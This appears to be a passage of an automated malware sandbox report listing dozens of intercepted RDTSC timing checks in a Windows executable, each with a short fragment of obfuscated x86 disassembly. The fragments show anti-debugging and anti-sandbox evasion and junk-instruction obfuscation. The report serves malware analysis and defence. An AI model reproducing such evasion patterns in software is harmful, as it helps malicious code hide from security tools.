    0x00000008 push eax
    0x00000009 push edx
    0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 115D92B, second address: 115D993, instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 pop edx
    0x00000005 pop eax
    0x00000006 pop eax
    0x00000007 jmp 00007F5E94757CA9h
    0x0000000c push 00000003h
    0x0000000e or edx, 193B9008h
    0x00000014 push 00000000h
    0x00000016 mov esi, eax
    0x00000018 push 00000003h
    0x0000001a push 00000000h
    0x0000001c push edi
    0x0000001d call 00007F5E94757C98h
    0x00000022 pop edi
    0x00000023 mov dword ptr [esp+04h], edi
    0x00000027 add dword ptr [esp+04h], 0000001Dh
    0x0000002f inc edi
    0x00000030 push edi
    0x00000031 ret
    0x00000032 pop edi
    0x00000033 ret
    0x00000034 or dword ptr [ebp+122D2D40h], eax
    0x0000003a push 804A29A1h
    0x0000003f push eax
    0x00000040 push edx
    0x00000041 push edx
    0x00000042 je 00007F5E94757C96h
    0x00000048 pop edx
    0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 115D993, second address: 115D9ED, instructions:
    0x00000000 rdtsc
    0x00000002 pushad
    0x00000003 jo 00007F5E94E4CBA6h
    0x00000009 jne 00007F5E94E4CBA6h
    0x0000000f popad
    0x00000010 pop edx
    0x00000011 pop eax
    0x00000012 xor dword ptr [esp], 404A29A1h
    0x00000019 jng 00007F5E94E4CBBBh
    0x0000001f lea ebx, dword ptr [ebp+1244F786h]
    0x00000025 sub dh, FFFFFFA7h
    0x00000028 push eax
    0x00000029 push eax
    0x0000002a push edx
    0x0000002b pushad
    0x0000002c pushad
    0x0000002d popad
    0x0000002e jmp 00007F5E94E4CBB6h
    0x00000033 popad
    0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DA30 second address: 115DAAC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5E94757C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D2D85h], edx 0x00000014 push ebx 0x00000015 jmp 00007F5E94757CA8h 0x0000001a pop edx 0x0000001b push 00000000h 0x0000001d mov di, EF00h 0x00000021 call 00007F5E94757C99h 0x00000026 jmp 00007F5E94757CA1h 0x0000002b push eax 0x0000002c pushad 0x0000002d jne 00007F5E94757C98h 0x00000033 push eax 0x00000034 push esi 0x00000035 pop esi 0x00000036 pop eax 0x00000037 popad 0x00000038 mov eax, dword ptr [esp+04h] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F5E94757CA9h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DC2D second address: 115DC3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DD71 second address: 115DD75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DD75 second address: 115DD91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DD91 second address: 115DD96 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DD96 second address: 115DE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 sbb dx, BF45h 0x0000000d push 00000003h 0x0000000f js 00007F5E94E4CBA6h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F5E94E4CBA8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 push 00000003h 0x00000033 add edx, 39414C39h 0x00000039 call 00007F5E94E4CBA9h 0x0000003e jp 00007F5E94E4CBACh 0x00000044 pushad 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 push eax 0x00000048 pop eax 0x00000049 popad 0x0000004a push eax 0x0000004b push edx 0x0000004c push ecx 0x0000004d push esi 0x0000004e pop esi 0x0000004f pop ecx 0x00000050 pop edx 0x00000051 mov eax, dword ptr [esp+04h] 0x00000055 jbe 00007F5E94E4CBB0h 0x0000005b pushad 0x0000005c push ecx 0x0000005d pop ecx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DE05 second address: 115DE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c jo 00007F5E94757C9Ch 0x00000012 jne 00007F5E94757C96h 0x00000018 popad 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e pushad 0x0000001f push edi 0x00000020 pop edi 0x00000021 jmp 00007F5E94757CA2h 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 jbe 00007F5E94757C96h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DE41 second address: 115DE61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 sub dword ptr [ebp+122D2096h], edi 0x0000000e lea ebx, dword ptr [ebp+1244F79Ah] 0x00000014 jc 00007F5E94E4CBA6h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DE61 second address: 115DE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757CA5h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DE7B second address: 115DE93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E94E4CBB4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B37A second address: 117B37E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B37E second address: 117B395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push ecx 0x0000000b js 00007F5E94E4CBA6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B395 second address: 117B3B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757CA3h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B941 second address: 117B947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BACC second address: 117BAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnc 00007F5E94757C9Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BAE0 second address: 117BAE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BBF9 second address: 117BBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BBFD second address: 117BC01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BEAD second address: 117BEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757CA9h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F5E94757C9Bh 0x00000010 popad 0x00000011 jmp 00007F5E94757CA1h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C09D second address: 117C0AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C22F second address: 117C233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C4AA second address: 117C4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141514 second address: 1141518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CBCD second address: 117CBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94E4CBAAh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F5E94E4CBB3h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CD2C second address: 117CD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5E94757C96h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CD3A second address: 117CD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D049 second address: 117D051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D051 second address: 117D058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D058 second address: 117D07F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5E94757C98h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5E94757C9Eh 0x0000000f jmp 00007F5E94757C9Dh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D07F second address: 117D083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117F51E second address: 117F524 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181CD5 second address: 1181CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181E2D second address: 1181E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F5E94757C96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181E3C second address: 1181E64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187BE7 second address: 1187BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757CA2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187BFD second address: 1187C15 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5E94E4CBA6h 0x00000008 jl 00007F5E94E4CBA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007F5E94E4CBACh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118805C second address: 1188077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94757CA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1188077 second address: 118807B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11881ED second address: 11881F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11881F1 second address: 1188209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBAAh 0x00000007 js 00007F5E94E4CBA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B673 second address: 118B678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B734 second address: 118B738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B738 second address: 118B73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B73E second address: 118B753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F5E94E4CBA6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B753 second address: 118B757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118BDEF second address: 118BDF5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118BEF8 second address: 118BEFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118BEFE second address: 118BF03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C45D second address: 118C48D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007F5E94757C9Bh 0x0000000d xchg eax, ebx 0x0000000e jng 00007F5E94757C97h 0x00000014 mov dword ptr [ebp+122D1BE7h], edx 0x0000001a push eax 0x0000001b jo 00007F5E94757CBBh 0x00000021 push eax 0x00000022 push edx 0x00000023 jnp 00007F5E94757C96h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C670 second address: 118C675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C978 second address: 118C986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 je 00007F5E94757C96h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E906 second address: 118E90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113C510 second address: 113C516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D848 second address: 118D84D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113C516 second address: 113C525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jc 00007F5E94757C96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113C525 second address: 113C52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113C52A second address: 113C530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F04C second address: 118F06F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F5E94E4CBA6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F06F second address: 118F079 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E94757C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F805 second address: 118F819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5E94E4CBADh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191CAC second address: 1191CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191CB0 second address: 1191CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11943FA second address: 119440F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F5E94757C9Ch 0x0000000c jp 00007F5E94757C96h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119601E second address: 1196024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196024 second address: 1196028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196028 second address: 119602C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119796B second address: 1197985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5E94757CA1h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197985 second address: 11979A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5E94E4CBAAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c je 00007F5E94E4CBC0h 0x00000012 jo 00007F5E94E4CBACh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150572 second address: 115057B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115057B second address: 1150581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119AC95 second address: 119AD30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757C9Ch 0x00000009 popad 0x0000000a jne 00007F5E94757CA1h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 xor ebx, dword ptr [ebp+122D2B35h] 0x0000001a push 00000000h 0x0000001c mov ebx, dword ptr [ebp+122D1B61h] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ecx 0x00000027 call 00007F5E94757C98h 0x0000002c pop ecx 0x0000002d mov dword ptr [esp+04h], ecx 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc ecx 0x0000003a push ecx 0x0000003b ret 0x0000003c pop ecx 0x0000003d ret 0x0000003e mov ebx, esi 0x00000040 mov dword ptr [ebp+122D2646h], edx 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 pushad 0x00000049 push edx 0x0000004a pop edx 0x0000004b push edx 0x0000004c pop edx 0x0000004d popad 0x0000004e jmp 00007F5E94757CA9h 0x00000053 popad 0x00000054 push eax 0x00000055 pushad 0x00000056 jmp 00007F5E94757CA0h 0x0000005b push eax 0x0000005c push edx 0x0000005d jc 00007F5E94757C96h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1199D90 second address: 1199E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jp 00007F5E94E4CBB9h 0x0000000d popad 0x0000000e push eax 0x0000000f je 00007F5E94E4CBBAh 0x00000015 jmp 00007F5E94E4CBB4h 0x0000001a nop 0x0000001b mov di, cx 0x0000001e push dword ptr fs:[00000000h] 0x00000025 xor dword ptr [ebp+1245F734h], eax 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov edi, 30638B48h 0x00000037 mov eax, dword ptr [ebp+122D0C39h] 0x0000003d push edi 0x0000003e jmp 00007F5E94E4CBACh 0x00000043 pop edi 0x00000044 push FFFFFFFFh 0x00000046 push 00000000h 0x00000048 push esi 0x00000049 call 00007F5E94E4CBA8h 0x0000004e pop esi 0x0000004f mov dword ptr [esp+04h], esi 0x00000053 add dword ptr [esp+04h], 00000016h 0x0000005b inc esi 0x0000005c push esi 0x0000005d ret 0x0000005e pop esi 0x0000005f ret 0x00000060 push eax 0x00000061 mov edi, eax 0x00000063 pop edi 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 push esi 0x00000069 pop esi 0x0000006a push ebx 0x0000006b pop ebx 0x0000006c popad 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119DD20 second address: 119DD2A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E94757C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119CF3B second address: 119CF40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119CFF4 second address: 119CFF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119EE4D second address: 119EE67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119EE67 second address: 119EE6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119FF7D second address: 119FF81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119FF81 second address: 119FF8E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5E94757C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A014E second address: 11A0152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A109C second address: 11A10A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A10A2 second address: 11A10A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3094 second address: 11A3098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4190 second address: 11A419A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5E94E4CBA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E371B second address: 11E3727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5E94E4CBA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
